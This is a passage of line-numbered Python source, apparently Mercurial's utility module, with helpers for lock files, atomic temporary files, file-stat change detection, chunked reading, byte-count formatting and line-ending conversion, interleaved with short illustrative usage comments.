1819 1820 timer = time.time
1820 1821
1821 1822 if safehasattr(time, "perf_counter"):
1822 1823 timer = time.perf_counter
1823 1824
1824 1825 def makelock(info, pathname):
1825 1826 """Create a lock file atomically if possible
1826 1827
1827 1828 This may leave a stale lock file if symlinks aren't supported and a
1828 1829 signal interrupt arrives.
1829 1830 """
1830 1831 try:
1831 1832 return os.symlink(info, pathname)
1832 1833 except OSError as why:
1833 1834 if why.errno == errno.EEXIST:
1834 1835 raise
1835 1836 except AttributeError: # no symlink in os
1836 1837 pass
1837 1838
1838 1839 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 1840 ld = os.open(pathname, flags)
1840 1841 os.write(ld, info)
1841 1842 os.close(ld)
1842 1843
1843 1844 def readlock(pathname):
1844 1845 try:
1845 1846 return readlink(pathname)
1846 1847 except OSError as why:
1847 1848 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 1849 raise
1849 1850 except AttributeError: # no symlink in os
1850 1851 pass
1851 1852 with posixfile(pathname, 'rb') as fp:
1852 1853 return fp.read()
1853 1854
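# Example (illustrative sketch; the path and contents are hypothetical):
# makelock stores the lock holder's identity in a symlink when possible,
# falling back to a regular file, and readlock retrieves it either way.
#
#   makelock(b'myhost:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')   # -> b'myhost:12345'
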
1854 1855 def fstat(fp):
1855 1856 '''stat file object that may not have fileno method.'''
1856 1857 try:
1857 1858 return os.fstat(fp.fileno())
1858 1859 except AttributeError:
1859 1860 return os.stat(fp.name)
1860 1861
1861 1862 # File system features
1862 1863
1863 1864 def fscasesensitive(path):
1864 1865 """
1865 1866 Return true if the given path is on a case-sensitive filesystem
1866 1867
1867 1868 Requires a path (like /foo/.hg) ending with a foldable final
1868 1869 directory component.
1869 1870 """
1870 1871 s1 = os.lstat(path)
1871 1872 d, b = os.path.split(path)
1872 1873 b2 = b.upper()
1873 1874 if b == b2:
1874 1875 b2 = b.lower()
1875 1876 if b == b2:
1876 1877 return True # no evidence against case sensitivity
1877 1878 p2 = os.path.join(d, b2)
1878 1879 try:
1879 1880 s2 = os.lstat(p2)
1880 1881 if s2 == s1:
1881 1882 return False
1882 1883 return True
1883 1884 except OSError:
1884 1885 return True
1885 1886
1886 1887 try:
1887 1888 import re2
1888 1889 _re2 = None
1889 1890 except ImportError:
1890 1891 _re2 = False
1891 1892
1892 1893 class _re(object):
1893 1894 def _checkre2(self):
1894 1895 global _re2
1895 1896 try:
1896 1897 # check if match works, see issue3964
1897 1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 1899 except ImportError:
1899 1900 _re2 = False
1900 1901
1901 1902 def compile(self, pat, flags=0):
1902 1903 '''Compile a regular expression, using re2 if possible
1903 1904
1904 1905 For best performance, use only re2-compatible regexp features. The
1905 1906 only flags from the re module that are re2-compatible are
1906 1907 IGNORECASE and MULTILINE.'''
1907 1908 if _re2 is None:
1908 1909 self._checkre2()
1909 1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 1911 if flags & remod.IGNORECASE:
1911 1912 pat = '(?i)' + pat
1912 1913 if flags & remod.MULTILINE:
1913 1914 pat = '(?m)' + pat
1914 1915 try:
1915 1916 return re2.compile(pat)
1916 1917 except re2.error:
1917 1918 pass
1918 1919 return remod.compile(pat, flags)
1919 1920
1920 1921 @propertycache
1921 1922 def escape(self):
1922 1923 '''Return the version of escape corresponding to self.compile.
1923 1924
1924 1925 This is imperfect because whether re2 or re is used for a particular
1925 1926 function depends on the flags, etc, but it's the best we can do.
1926 1927 '''
1927 1928 global _re2
1928 1929 if _re2 is None:
1929 1930 self._checkre2()
1930 1931 if _re2:
1931 1932 return re2.escape
1932 1933 else:
1933 1934 return remod.escape
1934 1935
1935 1936 re = _re()
1936 1937
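# Example (illustrative): the module-level `re` object prefers re2 when the
# optional re2 bindings are importable, and silently falls back to the stdlib
# `re` module for patterns or flags re2 can't handle.
#
#   pat = re.compile(br'\d+')                 # re2-backed if available
#   pat = re.compile(br'\d+', remod.DOTALL)   # unsupported flag -> stdlib re
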
1937 1938 _fspathcache = {}
1938 1939 def fspath(name, root):
1939 1940 '''Get name in the case stored in the filesystem
1940 1941
1941 1942 The name should be relative to root, and be normcase-ed for efficiency.
1942 1943
1943 1944 Note that this function is unnecessary, and should not be
1944 1945 called, for case-sensitive filesystems (simply because it's expensive).
1945 1946
1946 1947 The root should be normcase-ed, too.
1947 1948 '''
1948 1949 def _makefspathcacheentry(dir):
1949 1950 return dict((normcase(n), n) for n in os.listdir(dir))
1950 1951
1951 1952 seps = pycompat.ossep
1952 1953 if pycompat.osaltsep:
1953 1954 seps = seps + pycompat.osaltsep
1954 1955 # Protect backslashes. This gets silly very quickly.
1955 1956 seps = seps.replace('\\', '\\\\')
1956 1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 1958 dir = os.path.normpath(root)
1958 1959 result = []
1959 1960 for part, sep in pattern.findall(name):
1960 1961 if sep:
1961 1962 result.append(sep)
1962 1963 continue
1963 1964
1964 1965 if dir not in _fspathcache:
1965 1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 1967 contents = _fspathcache[dir]
1967 1968
1968 1969 found = contents.get(part)
1969 1970 if not found:
1970 1971 # retry "once per directory" per "dirstate.walk", which
1971 1972 # may take place for each patch of "hg qpush", for example
1972 1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 1974 found = contents.get(part)
1974 1975
1975 1976 result.append(found or part)
1976 1977 dir = os.path.join(dir, part)
1977 1978
1978 1979 return ''.join(result)
1979 1980
1980 1981 def checknlink(testfile):
1981 1982 '''check whether hardlink count reporting works properly'''
1982 1983
1983 1984 # testfile may be open, so we need a separate file for checking to
1984 1985 # work around issue2543 (or testfile may get lost on Samba shares)
1985 1986 f1, f2, fp = None, None, None
1986 1987 try:
1987 1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 1989 suffix='1~', dir=os.path.dirname(testfile))
1989 1990 os.close(fd)
1990 1991 f2 = '%s2~' % f1[:-2]
1991 1992
1992 1993 oslink(f1, f2)
1993 1994 # nlinks() may behave differently for files on Windows shares if
1994 1995 # the file is open.
1995 1996 fp = posixfile(f2)
1996 1997 return nlinks(f2) > 1
1997 1998 except OSError:
1998 1999 return False
1999 2000 finally:
2000 2001 if fp is not None:
2001 2002 fp.close()
2002 2003 for f in (f1, f2):
2003 2004 try:
2004 2005 if f is not None:
2005 2006 os.unlink(f)
2006 2007 except OSError:
2007 2008 pass
2008 2009
2009 2010 def endswithsep(path):
2010 2011 '''Check path ends with os.sep or os.altsep.'''
2011 2012 return (path.endswith(pycompat.ossep)
2012 2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013 2014
2014 2015 def splitpath(path):
2015 2016 '''Split path by os.sep.
2016 2017 Note that this function does not use os.altsep because it is
2017 2018 an alternative to a simple "xxx.split(os.sep)".
2018 2019 It is recommended to use os.path.normpath() before using this
2019 2020 function if needed.'''
2020 2021 return path.split(pycompat.ossep)
2021 2022
2022 2023 def mktempcopy(name, emptyok=False, createmode=None):
2023 2024 """Create a temporary file with the same contents from name
2024 2025
2025 2026 The permission bits are copied from the original file.
2026 2027
2027 2028 If the temporary file is going to be truncated immediately, you
2028 2029 can use emptyok=True as an optimization.
2029 2030
2030 2031 Returns the name of the temporary file.
2031 2032 """
2032 2033 d, fn = os.path.split(name)
2033 2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 2035 os.close(fd)
2035 2036 # Temporary files are created with mode 0600, which is usually not
2036 2037 # what we want. If the original file already exists, just copy
2037 2038 # its mode. Otherwise, manually obey umask.
2038 2039 copymode(name, temp, createmode)
2039 2040 if emptyok:
2040 2041 return temp
2041 2042 try:
2042 2043 try:
2043 2044 ifp = posixfile(name, "rb")
2044 2045 except IOError as inst:
2045 2046 if inst.errno == errno.ENOENT:
2046 2047 return temp
2047 2048 if not getattr(inst, 'filename', None):
2048 2049 inst.filename = name
2049 2050 raise
2050 2051 ofp = posixfile(temp, "wb")
2051 2052 for chunk in filechunkiter(ifp):
2052 2053 ofp.write(chunk)
2053 2054 ifp.close()
2054 2055 ofp.close()
2055 2056 except: # re-raises
2056 2057 try:
2057 2058 os.unlink(temp)
2058 2059 except OSError:
2059 2060 pass
2060 2061 raise
2061 2062 return temp
2062 2063
2063 2064 class filestat(object):
2064 2065 """help to exactly detect change of a file
2065 2066
2066 2067 The 'stat' attribute is the result of 'os.stat()' if the specified
2067 2068 'path' exists; otherwise, it is None. This saves clients of this
2068 2069 class a preparatory 'exists()' check.
2069 2070 """
2070 2071 def __init__(self, stat):
2071 2072 self.stat = stat
2072 2073
2073 2074 @classmethod
2074 2075 def frompath(cls, path):
2075 2076 try:
2076 2077 stat = os.stat(path)
2077 2078 except OSError as err:
2078 2079 if err.errno != errno.ENOENT:
2079 2080 raise
2080 2081 stat = None
2081 2082 return cls(stat)
2082 2083
2083 2084 @classmethod
2084 2085 def fromfp(cls, fp):
2085 2086 stat = os.fstat(fp.fileno())
2086 2087 return cls(stat)
2087 2088
2088 2089 __hash__ = object.__hash__
2089 2090
2090 2091 def __eq__(self, old):
2091 2092 try:
2092 2093 # if ambiguity between stat of new and old file is
2093 2094 # avoided, comparison of size, ctime and mtime is enough
2094 2095 # to exactly detect change of a file regardless of platform
2095 2096 return (self.stat.st_size == old.stat.st_size and
2096 2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 2099 except AttributeError:
2099 2100 pass
2100 2101 try:
2101 2102 return self.stat is None and old.stat is None
2102 2103 except AttributeError:
2103 2104 return False
2104 2105
2105 2106 def isambig(self, old):
2106 2107 """Examine whether new (= self) stat is ambiguous against old one
2107 2108
2108 2109 "S[N]" below means stat of a file at N-th change:
2109 2110
2110 2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 2112 - S[n-1].ctime == S[n].ctime
2112 2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116 2117
2117 2118 Case (*2) above means that a file was changed twice or more within
2118 2119 the same second (= S[n-1].ctime), so comparing timestamps cannot
2119 2120 detect the change.
2120 2121
2121 2122 The basic idea for avoiding such ambiguity is "advance mtime by 1
2122 2123 sec, if the timestamp is ambiguous".
2123 2124
2124 2125 But advancing mtime only in case (*2) doesn't work as
2125 2126 expected, because a naturally advanced S[n].mtime in case (*1)
2126 2127 might be equal to a manually advanced S[n-1 or earlier].mtime.
2127 2128
2128 2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 2130 treated as ambiguous regardless of mtime, to avoid overlooking
2130 2131 changes hidden by collisions between such mtimes.
2131 2132
2132 2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 2134 S[n].mtime", even if size of a file isn't changed.
2134 2135 """
2135 2136 try:
2136 2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 2138 except AttributeError:
2138 2139 return False
2139 2140
2140 2141 def avoidambig(self, path, old):
2141 2142 """Change file stat of specified path to avoid ambiguity
2142 2143
2143 2144 'old' should be previous filestat of 'path'.
2144 2145
2145 2146 Ambiguity avoidance is skipped if the process doesn't have
2146 2147 appropriate privileges for 'path'; in that case this returns
2147 2148 False.
2148 2149
2149 2150 Otherwise, this returns True, as "ambiguity is avoided".
2150 2151 """
2151 2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 2153 try:
2153 2154 os.utime(path, (advanced, advanced))
2154 2155 except OSError as inst:
2155 2156 if inst.errno == errno.EPERM:
2156 2157 # utime() on the file created by another user causes EPERM,
2157 2158 # if a process doesn't have appropriate privileges
2158 2159 return False
2159 2160 raise
2160 2161 return True
2161 2162
2162 2163 def __ne__(self, other):
2163 2164 return not self == other
2164 2165
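# Example (illustrative sketch): how callers such as copyfile and
# atomictempfile use filestat to detect and defuse timestamp ambiguity after
# rewriting a file in place.
#
#   oldstat = filestat.frompath(path)
#   ... rewrite the file at path ...
#   newstat = filestat.frompath(path)
#   if newstat.isambig(oldstat):
#       newstat.avoidambig(path, oldstat)   # bump mtime by one second
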
2165 2166 class atomictempfile(object):
2166 2167 '''writable file object that atomically updates a file
2167 2168
2168 2169 All writes will go to a temporary copy of the original file. Call
2169 2170 close() when you are done writing, and atomictempfile will rename
2170 2171 the temporary copy to the original name, making the changes
2171 2172 visible. If the object is destroyed without being closed, all your
2172 2173 writes are discarded.
2173 2174
2174 2175 checkambig argument of constructor is used with filestat, and is
2175 2176 useful only if target file is guarded by any lock (e.g. repo.lock
2176 2177 or repo.wlock).
2177 2178 '''
2178 2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 2180 self.__name = name # permanent name
2180 2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 2182 createmode=createmode)
2182 2183 self._fp = posixfile(self._tempname, mode)
2183 2184 self._checkambig = checkambig
2184 2185
2185 2186 # delegated methods
2186 2187 self.read = self._fp.read
2187 2188 self.write = self._fp.write
2188 2189 self.seek = self._fp.seek
2189 2190 self.tell = self._fp.tell
2190 2191 self.fileno = self._fp.fileno
2191 2192
2192 2193 def close(self):
2193 2194 if not self._fp.closed:
2194 2195 self._fp.close()
2195 2196 filename = localpath(self.__name)
2196 2197 oldstat = self._checkambig and filestat.frompath(filename)
2197 2198 if oldstat and oldstat.stat:
2198 2199 rename(self._tempname, filename)
2199 2200 newstat = filestat.frompath(filename)
2200 2201 if newstat.isambig(oldstat):
2201 2202 # stat of changed file is ambiguous to original one
2202 2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 2204 os.utime(filename, (advanced, advanced))
2204 2205 else:
2205 2206 rename(self._tempname, filename)
2206 2207
2207 2208 def discard(self):
2208 2209 if not self._fp.closed:
2209 2210 try:
2210 2211 os.unlink(self._tempname)
2211 2212 except OSError:
2212 2213 pass
2213 2214 self._fp.close()
2214 2215
2215 2216 def __del__(self):
2216 2217 if safehasattr(self, '_fp'): # constructor actually did something
2217 2218 self.discard()
2218 2219
2219 2220 def __enter__(self):
2220 2221 return self
2221 2222
2222 2223 def __exit__(self, exctype, excvalue, traceback):
2223 2224 if exctype is not None:
2224 2225 self.discard()
2225 2226 else:
2226 2227 self.close()
2227 2228
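# Example (illustrative sketch; the filename is hypothetical): atomictempfile
# as a context manager either publishes all writes at once or none of them.
#
#   with atomictempfile(b'requires', b'wb') as fp:
#       fp.write(b'revlogv1\n')
#   # on normal exit the temporary copy is renamed over b'requires';
#   # if the block raises, the temporary copy is discarded instead
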
2228 2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 2230 """unlink and remove the directory if it is empty"""
2230 2231 if ignoremissing:
2231 2232 tryunlink(f)
2232 2233 else:
2233 2234 unlink(f)
2234 2235 if rmdir:
2235 2236 # try removing directories that might now be empty
2236 2237 try:
2237 2238 removedirs(os.path.dirname(f))
2238 2239 except OSError:
2239 2240 pass
2240 2241
2241 2242 def tryunlink(f):
2242 2243 """Attempt to remove a file, ignoring ENOENT errors."""
2243 2244 try:
2244 2245 unlink(f)
2245 2246 except OSError as e:
2246 2247 if e.errno != errno.ENOENT:
2247 2248 raise
2248 2249
2249 2250 def makedirs(name, mode=None, notindexed=False):
2250 2251 """recursive directory creation with parent mode inheritance
2251 2252
2252 2253 Newly created directories are marked as "not to be indexed by
2253 2254 the content indexing service", if ``notindexed`` is specified
2254 2255 for "write" mode access.
2255 2256 """
2256 2257 try:
2257 2258 makedir(name, notindexed)
2258 2259 except OSError as err:
2259 2260 if err.errno == errno.EEXIST:
2260 2261 return
2261 2262 if err.errno != errno.ENOENT or not name:
2262 2263 raise
2263 2264 parent = os.path.dirname(os.path.abspath(name))
2264 2265 if parent == name:
2265 2266 raise
2266 2267 makedirs(parent, mode, notindexed)
2267 2268 try:
2268 2269 makedir(name, notindexed)
2269 2270 except OSError as err:
2270 2271 # Catch EEXIST to handle races
2271 2272 if err.errno == errno.EEXIST:
2272 2273 return
2273 2274 raise
2274 2275 if mode is not None:
2275 2276 os.chmod(name, mode)
2276 2277
2277 2278 def readfile(path):
2278 2279 with open(path, 'rb') as fp:
2279 2280 return fp.read()
2280 2281
2281 2282 def writefile(path, text):
2282 2283 with open(path, 'wb') as fp:
2283 2284 fp.write(text)
2284 2285
2285 2286 def appendfile(path, text):
2286 2287 with open(path, 'ab') as fp:
2287 2288 fp.write(text)
2288 2289
2289 2290 class chunkbuffer(object):
2290 2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 2292 iterator over chunks of arbitrary size."""
2292 2293
2293 2294 def __init__(self, in_iter):
2294 2295 """in_iter is the iterator that's iterating over the input chunks."""
2295 2296 def splitbig(chunks):
2296 2297 for chunk in chunks:
2297 2298 if len(chunk) > 2**20:
2298 2299 pos = 0
2299 2300 while pos < len(chunk):
2300 2301 end = pos + 2 ** 18
2301 2302 yield chunk[pos:end]
2302 2303 pos = end
2303 2304 else:
2304 2305 yield chunk
2305 2306 self.iter = splitbig(in_iter)
2306 2307 self._queue = collections.deque()
2307 2308 self._chunkoffset = 0
2308 2309
2309 2310 def read(self, l=None):
2310 2311 """Read L bytes of data from the iterator of chunks of data.
2311 2312 Returns less than L bytes if the iterator runs dry.
2312 2313
2313 2314 If size parameter is omitted, read everything"""
2314 2315 if l is None:
2315 2316 return ''.join(self.iter)
2316 2317
2317 2318 left = l
2318 2319 buf = []
2319 2320 queue = self._queue
2320 2321 while left > 0:
2321 2322 # refill the queue
2322 2323 if not queue:
2323 2324 target = 2**18
2324 2325 for chunk in self.iter:
2325 2326 queue.append(chunk)
2326 2327 target -= len(chunk)
2327 2328 if target <= 0:
2328 2329 break
2329 2330 if not queue:
2330 2331 break
2331 2332
2332 2333 # The easy way to do this would be to queue.popleft(), modify the
2333 2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 2335 # where we read partial chunk content, this incurs 2 dequeue
2335 2336 # mutations and creates a new str for the remaining chunk in the
2336 2337 # queue. Our code below avoids this overhead.
2337 2338
2338 2339 chunk = queue[0]
2339 2340 chunkl = len(chunk)
2340 2341 offset = self._chunkoffset
2341 2342
2342 2343 # Use full chunk.
2343 2344 if offset == 0 and left >= chunkl:
2344 2345 left -= chunkl
2345 2346 queue.popleft()
2346 2347 buf.append(chunk)
2347 2348 # self._chunkoffset remains at 0.
2348 2349 continue
2349 2350
2350 2351 chunkremaining = chunkl - offset
2351 2352
2352 2353 # Use all of unconsumed part of chunk.
2353 2354 if left >= chunkremaining:
2354 2355 left -= chunkremaining
2355 2356 queue.popleft()
2356 2357 # The offset == 0 case is handled by the block above, so this
2357 2358 # slice won't merely copy the full chunk via ``chunk[0:]``.
2358 2359 buf.append(chunk[offset:])
2359 2360 self._chunkoffset = 0
2360 2361
2361 2362 # Partial chunk needed.
2362 2363 else:
2363 2364 buf.append(chunk[offset:offset + left])
2364 2365 self._chunkoffset += left
2365 2366 left -= chunkremaining
2366 2367
2367 2368 return ''.join(buf)
2368 2369
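# Example (illustrative): fixed-size reads spanning chunk boundaries.
#
#   buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#   buf.read(4)   # -> b'abcd'
#   buf.read(4)   # -> b'efgh'
#   buf.read(4)   # -> b'' once the underlying iterator is exhausted
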
2369 2370 def filechunkiter(f, size=131072, limit=None):
2370 2371 """Create a generator that produces the data in the file size
2371 2372 (default 131072) bytes at a time, up to optional limit (default is
2372 2373 to read all data). Chunks may be less than size bytes if the
2373 2374 chunk is the last chunk in the file, or the file is a socket or
2374 2375 some other type of file that sometimes reads less data than is
2375 2376 requested."""
2376 2377 assert size >= 0
2377 2378 assert limit is None or limit >= 0
2378 2379 while True:
2379 2380 if limit is None:
2380 2381 nbytes = size
2381 2382 else:
2382 2383 nbytes = min(limit, size)
2383 2384 s = nbytes and f.read(nbytes)
2384 2385 if not s:
2385 2386 break
2386 2387 if limit:
2387 2388 limit -= len(s)
2388 2389 yield s
2389 2390
2390 2391 class cappedreader(object):
2391 2392 """A file object proxy that allows reading up to N bytes.
2392 2393
2393 2394 Given a source file object, instances of this type allow reading up to
2394 2395 N bytes from that source file object. Attempts to read past the allowed
2395 2396 limit are treated as EOF.
2396 2397
2397 2398 It is assumed that I/O is not performed on the original file object
2398 2399 in addition to I/O that is performed by this instance. If there is,
2399 2400 state tracking will get out of sync and unexpected results will ensue.
2400 2401 """
2401 2402 def __init__(self, fh, limit):
2402 2403 """Allow reading up to <limit> bytes from <fh>."""
2403 2404 self._fh = fh
2404 2405 self._left = limit
2405 2406
2406 2407 def read(self, n=-1):
2407 2408 if not self._left:
2408 2409 return b''
2409 2410
2410 2411 if n < 0:
2411 2412 n = self._left
2412 2413
2413 2414 data = self._fh.read(min(n, self._left))
2414 2415 self._left -= len(data)
2415 2416 assert self._left >= 0
2416 2417
2417 2418 return data
2418 2419
2419 2420 def readinto(self, b):
2420 2421 res = self.read(len(b))
2421 2422 if res is None:
2422 2423 return None
2423 2424
2424 2425 b[0:len(res)] = res
2425 2426 return len(res)
2426 2427
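# Example (illustrative): capping reads from a larger stream.
#
#   fh = stringio(b'0123456789')
#   reader = cappedreader(fh, 4)
#   reader.read()    # -> b'0123'
#   reader.read(1)   # -> b'' (the limit is treated as EOF)
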
2427 2428 def unitcountfn(*unittable):
2428 2429 '''return a function that renders a readable count of some quantity'''
2429 2430
2430 2431 def go(count):
2431 2432 for multiplier, divisor, format in unittable:
2432 2433 if abs(count) >= divisor * multiplier:
2433 2434 return format % (count / float(divisor))
2434 2435 return unittable[-1][2] % count
2435 2436
2436 2437 return go
2437 2438
2438 2439 def processlinerange(fromline, toline):
2439 2440 """Check that linerange <fromline>:<toline> makes sense and return a
2440 2441 0-based range.
2441 2442
2442 2443 >>> processlinerange(10, 20)
2443 2444 (9, 20)
2444 2445 >>> processlinerange(2, 1)
2445 2446 Traceback (most recent call last):
2446 2447 ...
2447 2448 ParseError: line range must be positive
2448 2449 >>> processlinerange(0, 5)
2449 2450 Traceback (most recent call last):
2450 2451 ...
2451 2452 ParseError: fromline must be strictly positive
2452 2453 """
2453 2454 if toline - fromline < 0:
2454 2455 raise error.ParseError(_("line range must be positive"))
2455 2456 if fromline < 1:
2456 2457 raise error.ParseError(_("fromline must be strictly positive"))
2457 2458 return fromline - 1, toline
2458 2459
2459 2460 bytecount = unitcountfn(
2460 2461 (100, 1 << 30, _('%.0f GB')),
2461 2462 (10, 1 << 30, _('%.1f GB')),
2462 2463 (1, 1 << 30, _('%.2f GB')),
2463 2464 (100, 1 << 20, _('%.0f MB')),
2464 2465 (10, 1 << 20, _('%.1f MB')),
2465 2466 (1, 1 << 20, _('%.2f MB')),
2466 2467 (100, 1 << 10, _('%.0f KB')),
2467 2468 (10, 1 << 10, _('%.1f KB')),
2468 2469 (1, 1 << 10, _('%.2f KB')),
2469 2470 (1, 1, _('%.0f bytes')),
2470 2471 )
2471 2472
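# Example (illustrative): bytecount picks the coarsest unit whose threshold
# the value reaches, with more decimals for smaller magnitudes.
#
#   bytecount(100)      # -> '100 bytes'
#   bytecount(100000)   # -> '97.7 KB'
#   bytecount(2 ** 30)  # -> '1.00 GB'
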
2472 2473 class transformingwriter(object):
2473 2474 """Writable file wrapper to transform data by function"""
2474 2475
2475 2476 def __init__(self, fp, encode):
2476 2477 self._fp = fp
2477 2478 self._encode = encode
2478 2479
2479 2480 def close(self):
2480 2481 self._fp.close()
2481 2482
2482 2483 def flush(self):
2483 2484 self._fp.flush()
2484 2485
2485 2486 def write(self, data):
2486 2487 return self._fp.write(self._encode(data))
2487 2488
2488 2489 # Matches a single EOL which can either be a CRLF where repeated CR
2489 2490 # are removed or a LF. We do not care about old Macintosh files, so a
2490 2491 # stray CR is an error.
2491 2492 _eolre = remod.compile(br'\r*\n')
2492 2493
2493 2494 def tolf(s):
2494 2495 return _eolre.sub('\n', s)
2495 2496
2496 2497 def tocrlf(s):
2497 2498 return _eolre.sub('\r\n', s)
2498 2499
2499 2500 def _crlfwriter(fp):
2500 2501 return transformingwriter(fp, tocrlf)
2501 2502
2502 2503 if pycompat.oslinesep == '\r\n':
2503 2504 tonativeeol = tocrlf
2504 2505 fromnativeeol = tolf
2505 2506 nativeeolwriter = _crlfwriter
2506 2507 else:
2507 2508 tonativeeol = pycompat.identity
2508 2509 fromnativeeol = pycompat.identity
2509 2510 nativeeolwriter = pycompat.identity
2510 2511
2511 2512 if (pyplatform.python_implementation() == 'CPython' and
2512 2513 sys.version_info < (3, 0)):
2513 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2514 2515 # correctly. The following table shows what CPython version (and functions)
2515 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 2517 #
2517 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 2519 # --------------------------------------------------
2519 2520 # fp.__iter__ | buggy | buggy | okay
2520 2521 # fp.read* | buggy | okay [1] | okay
2521 2522 #
2522 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 2524 #
2524 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 2527 #
2527 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 2531 # fp.__iter__ but not other fp.read* methods.
2531 2532 #
2532 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 2537 # to minimize the performance impact.
2537 2538 if sys.version_info >= (2, 7, 4):
2538 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 2540 def _safeiterfile(fp):
2540 2541 return iter(fp.readline, '')
2541 2542 else:
2542 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 2544 # note: this may block longer than necessary because of bufsize.
2544 2545 def _safeiterfile(fp, bufsize=4096):
2545 2546 fd = fp.fileno()
2546 2547 line = ''
2547 2548 while True:
2548 2549 try:
2549 2550 buf = os.read(fd, bufsize)
2550 2551 except OSError as ex:
2551 2552 # os.read only raises EINTR before any data is read
2552 2553 if ex.errno == errno.EINTR:
2553 2554 continue
2554 2555 else:
2555 2556 raise
2556 2557 line += buf
2557 2558 if '\n' in buf:
2558 2559 splitted = line.splitlines(True)
2559 2560 line = ''
2560 2561 for l in splitted:
2561 2562 if l[-1] == '\n':
2562 2563 yield l
2563 2564 else:
2564 2565 line = l
2565 2566 if not buf:
2566 2567 break
2567 2568 if line:
2568 2569 yield line
2569 2570
2570 2571 def iterfile(fp):
2571 2572 fastpath = True
2572 2573 if type(fp) is file:
2573 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 2575 if fastpath:
2575 2576 return fp
2576 2577 else:
2577 2578 return _safeiterfile(fp)
2578 2579 else:
2579 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 2581 def iterfile(fp):
2581 2582 return fp
2582 2583
2583 2584 def iterlines(iterator):
2584 2585 for chunk in iterator:
2585 2586 for line in chunk.splitlines():
2586 2587 yield line
2587 2588
2588 2589 def expandpath(path):
2589 2590 return os.path.expanduser(os.path.expandvars(path))
2590 2591
2591 2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 2593 """Return the result of interpolating items in the mapping into string s.
2593 2594
2594 2595 prefix is a single character string, or a two character string with
2595 2596 a backslash as the first character if the prefix needs to be escaped in
2596 2597 a regular expression.
2597 2598
2598 2599 fn is an optional function that will be applied to the replacement text
2599 2600 just before replacement.
2600 2601
2601 2602 escape_prefix is an optional flag that allows using doubled prefix for
2602 2603 its escaping.
2603 2604 """
2604 2605 fn = fn or (lambda s: s)
2605 2606 patterns = '|'.join(mapping.keys())
2606 2607 if escape_prefix:
2607 2608 patterns += '|' + prefix
2608 2609 if len(prefix) > 1:
2609 2610 prefix_char = prefix[1:]
2610 2611 else:
2611 2612 prefix_char = prefix
2612 2613 mapping[prefix_char] = prefix_char
2613 2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615 2616
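# Example (illustrative): since '$' is special in regular expressions, the
# prefix must be passed pre-escaped, per the docstring above.
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
#   # -> b'hello alice'
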
2616 2617 def getport(port):
2617 2618 """Return the port for a given network service.
2618 2619
2619 2620 If port is an integer, it's returned as is. If it's a string, it's
2620 2621 looked up using socket.getservbyname(). If there's no matching
2621 2622 service, error.Abort is raised.
2622 2623 """
2623 2624 try:
2624 2625 return int(port)
2625 2626 except ValueError:
2626 2627 pass
2627 2628
2628 2629 try:
2629 2630 return socket.getservbyname(pycompat.sysstr(port))
2630 2631 except socket.error:
2631 2632 raise error.Abort(_("no port number associated with service '%s'")
2632 2633 % port)
2633 2634
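# Example (illustrative): numeric strings are returned as integers directly;
# service names go through the system services database.
#
#   getport(b'8080')   # -> 8080
#   getport(b'http')   # -> 80 on systems whose services database defines it
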
2634 2635 class url(object):
2635 2636 r"""Reliable URL parser.
2636 2637
2637 2638 This parses URLs and provides attributes for the following
2638 2639 components:
2639 2640
